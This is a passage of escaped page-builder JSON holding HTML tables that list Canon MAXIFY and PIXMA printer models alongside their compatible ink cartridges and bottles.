(Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5370<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5470<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E3170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E410<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E4270<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E470<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E477<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E480<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E510<\\/p><\\/td><td width=\\\"208\\\"><p>CL-98 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-88 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560 \\/ E560R<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G2010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G4010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110 (with battery)<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP1300<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2770 \\/ iP2772<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2870S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP4200<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP7270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP8770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6870<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2570S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2577S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3570<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3670<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG7570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP160<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP180<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP228<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP237<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td 